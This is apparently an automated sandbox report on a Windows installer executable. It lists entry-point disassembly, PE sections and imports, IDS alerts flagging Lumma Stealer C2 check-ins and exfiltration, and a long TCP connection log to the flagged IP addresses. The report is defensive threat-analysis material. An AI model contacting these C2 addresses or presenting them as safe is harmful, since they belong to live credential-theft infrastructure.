                                                                                                                                                                                                                                            push edi
                                                                                                                                                                                                                                            push 00000020h
                                                                                                                                                                                                                                            xor ebp, ebp
                                                                                                                                                                                                                                            pop esi
                                                                                                                                                                                                                                            mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                            mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                                                                            mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                            call dword ptr [00409030h]
                                                                                                                                                                                                                                            push 00008001h
                                                                                                                                                                                                                                            call dword ptr [004090B4h]
                                                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                                                            call dword ptr [004092C0h]
                                                                                                                                                                                                                                            push 00000008h
                                                                                                                                                                                                                                            mov dword ptr [0047EB98h], eax
                                                                                                                                                                                                                                            call 00007FEC755B69BBh
                                                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                                                            push 000002B4h
                                                                                                                                                                                                                                            mov dword ptr [0047EAB0h], eax
                                                                                                                                                                                                                                            lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                            push eax
                                                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                                                            push 0040A264h
                                                                                                                                                                                                                                            call dword ptr [00409184h]
                                                                                                                                                                                                                                            push 0040A24Ch
                                                                                                                                                                                                                                            push 00476AA0h
                                                                                                                                                                                                                                            call 00007FEC755B669Dh
                                                                                                                                                                                                                                            call dword ptr [004090B0h]
                                                                                                                                                                                                                                            push eax
                                                                                                                                                                                                                                            mov edi, 004CF0A0h
                                                                                                                                                                                                                                            push edi
                                                                                                                                                                                                                                            call 00007FEC755B668Bh
                                                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                                                            call dword ptr [00409134h]
                                                                                                                                                                                                                                            cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                                                                                            mov dword ptr [0047EAB8h], eax
                                                                                                                                                                                                                                            mov eax, edi
                                                                                                                                                                                                                                            jne 00007FEC755B3F8Ah
                                                                                                                                                                                                                                            push 00000022h
                                                                                                                                                                                                                                            pop esi
                                                                                                                                                                                                                                            mov eax, 004CF0A2h
                                                                                                                                                                                                                                            push esi
                                                                                                                                                                                                                                            push eax
                                                                                                                                                                                                                                            call 00007FEC755B6361h
                                                                                                                                                                                                                                            push eax
                                                                                                                                                                                                                                            call dword ptr [00409260h]
                                                                                                                                                                                                                                            mov esi, eax
                                                                                                                                                                                                                                            mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                            jmp 00007FEC755B4013h
                                                                                                                                                                                                                                            push 00000020h
                                                                                                                                                                                                                                            pop ebx
                                                                                                                                                                                                                                            cmp ax, bx
                                                                                                                                                                                                                                            jne 00007FEC755B3F8Ah
                                                                                                                                                                                                                                            add esi, 02h
                                                                                                                                                                                                                                            cmp word ptr [esi], bx
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ C ] VS2010 SP1 build 40219
• [RES] VS2010 SP1 build 40219
• [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xac40 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x100000 | 0x6f4ea | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x16d732 | 0x2958 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0x994 | .ndata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9000 | 0x2d0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x728c | 0x7400 | 419d4e1be1ac35a5db9c47f553b27cea | False | 0.6566540948275862 | data | 6.499708590628113 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x2b6e | 0x2c00 | cca1ca3fbf99570f6de9b43ce767f368 | False | 0.3678977272727273 | data | 4.497932535153822 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xc000 | 0x72b9c | 0x200 | 77f0839f8ebea31040e462523e1c770e | False | 0.279296875 | data | 1.8049406284608531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x7f000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x100000 | 0x6f4ea | 0x6f600 | 4a99cec358e39cb06ea38a8072526404 | False | 0.8860238671436588 | data | 7.633058654397923 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x170000 | 0xfd6 | 0x1000 | 7af67ceeee6e1f9fb0dc35ef8f7bdebc | False | 0.597900390625 | data | 5.574366794614882 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x100384 | 0x46843 | PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced | English | United States | 0.9962781518860249
RT_ICON | 0x146bc8 | 0x22b9 | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0012374845314433
RT_ICON | 0x148e84 | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | English | United States | 0.5441415785191213
RT_ICON | 0x14b4ec | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | English | United States | 0.6197632058287796
RT_ICON | 0x14c614 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.7615248226950354
RT_ICON | 0x14ca7c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m | | | 0.7828014184397163
RT_ICON | 0x14cee4 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m | | | 0.6174953095684803
RT_ICON | 0x14df8c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m | | | 0.5445020746887966
RT_ICON | 0x150534 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m | | | 0.45823967822075
RT_ICON | 0x160d5c | 0xe1a1 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9995844947282768
RT_DIALOG | 0x16ef00 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x16f000 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x16f11c | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x16f17c | 0x4c | data | | | 0.8289473684210527
RT_GROUP_ICON | 0x16f1c8 | 0x4c | data | English | United States | 0.8026315789473685
RT_MANIFEST | 0x16f214 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-23T10:35:29.900273+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49701 | 172.67.129.49 | 443 | TCP
2024-12-23T10:35:30.680014+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.16 | 49701 | 172.67.129.49 | 443 | TCP
2024-12-23T10:35:30.680014+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.16 | 49701 | 172.67.129.49 | 443 | TCP
2024-12-23T10:35:31.902946+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49702 | 172.67.129.49 | 443 | TCP
2024-12-23T10:35:32.670883+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.16 | 49702 | 172.67.129.49 | 443 | TCP
2024-12-23T10:35:32.670883+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.16 | 49702 | 172.67.129.49 | 443 | TCP
2024-12-23T10:35:34.403283+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49703 | 172.67.129.49 | 443 | TCP
2024-12-23T10:35:36.708516+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49704 | 172.67.129.49 | 443 | TCP
2024-12-23T10:35:39.155246+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49705 | 172.67.129.49 | 443 | TCP
2024-12-23T10:35:41.501174+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49706 | 172.67.129.49 | 443 | TCP
2024-12-23T10:35:42.313661+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.16 | 49706 | 172.67.129.49 | 443 | TCP
2024-12-23T10:35:44.561219+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49707 | 172.67.129.49 | 443 | TCP
2024-12-23T10:35:44.565019+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.16 | 49707 | 172.67.129.49 | 443 | TCP
2024-12-23T10:35:47.430212+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49708 | 172.67.129.49 | 443 | TCP
2024-12-23T10:35:48.489015+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.16 | 49708 | 172.67.129.49 | 443 | TCP
2024-12-23T10:35:50.025436+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49709 | 172.67.182.135 | 443 | TCP
2024-12-23T10:35:52.533661+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49710 | 45.66.248.134 | 443 | TCP
2024-12-23T10:36:04.160666+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49713 | 172.67.129.49 | 443 | TCP
2024-12-23T10:36:05.216655+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.16 | 49713 | 172.67.129.49 | 443 | TCP
2024-12-23T10:36:05.216655+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.16 | 49713 | 172.67.129.49 | 443 | TCP
2024-12-23T10:36:06.433805+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49714 | 172.67.129.49 | 443 | TCP
2024-12-23T10:36:07.234528+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.16 | 49714 | 172.67.129.49 | 443 | TCP
2024-12-23T10:36:07.234528+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.16 | 49714 | 172.67.129.49 | 443 | TCP
2024-12-23T10:36:08.927664+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49715 | 172.67.129.49 | 443 | TCP
2024-12-23T10:36:11.225911+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49716 | 172.67.129.49 | 443 | TCP
2024-12-23T10:36:12.366139+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.16 | 49716 | 172.67.129.49 | 443 | TCP
2024-12-23T10:36:13.871555+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49717 | 172.67.129.49 | 443 | TCP
2024-12-23T10:36:16.247344+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49718 | 172.67.129.49 | 443 | TCP
2024-12-23T10:36:18.521402+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49719 | 172.67.129.49 | 443 | TCP
2024-12-23T10:36:18.525635+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.16 | 49719 | 172.67.129.49 | 443 | TCP
2024-12-23T10:36:21.021576+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49720 | 172.67.129.49 | 443 | TCP
2024-12-23T10:36:21.780501+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.16 | 49720 | 172.67.129.49 | 443 | TCP
2024-12-23T10:36:22.922853+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49721 | 172.67.182.135 | 443 | TCP
2024-12-23T10:36:24.194307+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49722 | 45.66.248.134 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 10:35:28.678555012 CET | 49701 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:28.678606033 CET | 443 | 49701 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:28.678679943 CET | 49701 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:28.679811001 CET | 49701 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:28.679824114 CET | 443 | 49701 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:29.900196075 CET | 443 | 49701 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:29.900273085 CET | 49701 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:29.901844978 CET | 49701 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:29.901860952 CET | 443 | 49701 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:29.902259111 CET | 443 | 49701 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:29.944561005 CET | 49701 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:29.944586992 CET | 49701 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:29.944664001 CET | 443 | 49701 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:30.680023909 CET | 443 | 49701 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:30.680118084 CET | 443 | 49701 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:30.680181980 CET | 49701 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:30.681941032 CET | 49701 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:30.681982994 CET | 443 | 49701 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:30.682014942 CET | 49701 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:30.682045937 CET | 443 | 49701 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:30.689749956 CET | 49702 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:30.689805984 CET | 443 | 49702 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:30.689888000 CET | 49702 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:30.690165997 CET | 49702 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:30.690177917 CET | 443 | 49702 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:31.902862072 CET | 443 | 49702 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:31.902945995 CET | 49702 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:31.904165983 CET | 49702 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:31.904176950 CET | 443 | 49702 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:31.904426098 CET | 443 | 49702 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:31.905975103 CET | 49702 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:31.906013012 CET | 49702 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:31.906049967 CET | 443 | 49702 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:32.670984030 CET | 443 | 49702 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:32.671140909 CET | 443 | 49702 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:32.671240091 CET | 443 | 49702 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:32.671297073 CET | 49702 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:32.671333075 CET | 443 | 49702 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:32.671390057 CET | 49702 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:32.671399117 CET | 443 | 49702 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:32.678872108 CET | 443 | 49702 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:32.678944111 CET | 49702 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:32.678951025 CET | 443 | 49702 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:32.687310934 CET | 443 | 49702 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:32.687386990 CET | 49702 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:32.687392950 CET | 443 | 49702 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:32.695698977 CET | 443 | 49702 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:32.695772886 CET | 49702 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:32.695780039 CET | 443 | 49702 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:32.747324944 CET | 49702 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:32.790275097 CET | 443 | 49702 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:32.843333960 CET | 49702 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:32.843357086 CET | 443 | 49702 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:32.866537094 CET | 443 | 49702 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:32.866571903 CET | 443 | 49702 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:32.866625071 CET | 49702 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:32.866647005 CET | 443 | 49702 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:32.866686106 CET | 443 | 49702 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:32.866708994 CET | 49702 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:32.866724014 CET | 49702 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:32.866935015 CET | 49702 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:32.866950035 CET | 443 | 49702 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:32.866961956 CET | 49702 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:32.866966009 CET | 443 | 49702 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:33.187764883 CET | 49703 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:33.187887907 CET | 443 | 49703 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:33.187985897 CET | 49703 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:33.188373089 CET | 49703 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:33.188410997 CET | 443 | 49703 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:34.403168917 CET | 443 | 49703 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:34.403283119 CET | 49703 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:34.404495955 CET | 49703 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:34.404508114 CET | 443 | 49703 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:34.404789925 CET | 443 | 49703 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:34.406033039 CET | 49703 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:34.406234980 CET | 49703 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:34.406254053 CET | 443 | 49703 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:35.283368111 CET | 443 | 49703 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:35.283461094 CET | 443 | 49703 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:35.283533096 CET | 49703 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:35.283864975 CET | 49703 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:35.283884048 CET | 443 | 49703 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:35.495346069 CET | 49704 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:35.495450974 CET | 443 | 49704 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:35.495590925 CET | 49704 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:35.496064901 CET | 49704 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:35.496095896 CET | 443 | 49704 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:36.708367109 CET | 443 | 49704 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:36.708515882 CET | 49704 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:36.710309029 CET | 49704 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:36.710329056 CET | 443 | 49704 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:36.710568905 CET | 443 | 49704 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:36.711998940 CET | 49704 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:36.712198973 CET | 49704 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:36.712239027 CET | 443 | 49704 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:36.712310076 CET | 49704 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:36.759329081 CET | 443 | 49704 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:37.544462919 CET | 443 | 49704 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:37.544563055 CET | 443 | 49704 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:37.544617891 CET | 49704 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:37.546042919 CET | 49704 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:37.546072006 CET | 443 | 49704 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:37.943634033 CET | 49705 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:37.943669081 CET | 443 | 49705 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:37.943727016 CET | 49705 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:37.944050074 CET | 49705 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:37.944061995 CET | 443 | 49705 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:39.155143976 CET | 443 | 49705 | 172.67.129.49 | 192.168.2.16
Dec 23, 2024 10:35:39.155246019 CET | 49705 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:39.156486988 CET | 49705 | 443 | 192.168.2.16 | 172.67.129.49
Dec 23, 2024 10:35:39.156496048 CET | 443 | 49705 | 172.67.129.49 | 192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:39.156744003 CET44349705172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:39.157979012 CET49705443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:39.158143044 CET49705443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:39.158179045 CET44349705172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:39.158241034 CET49705443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:39.158250093 CET44349705172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:40.091259003 CET44349705172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:40.091360092 CET44349705172.67.129.49192.168.2.16
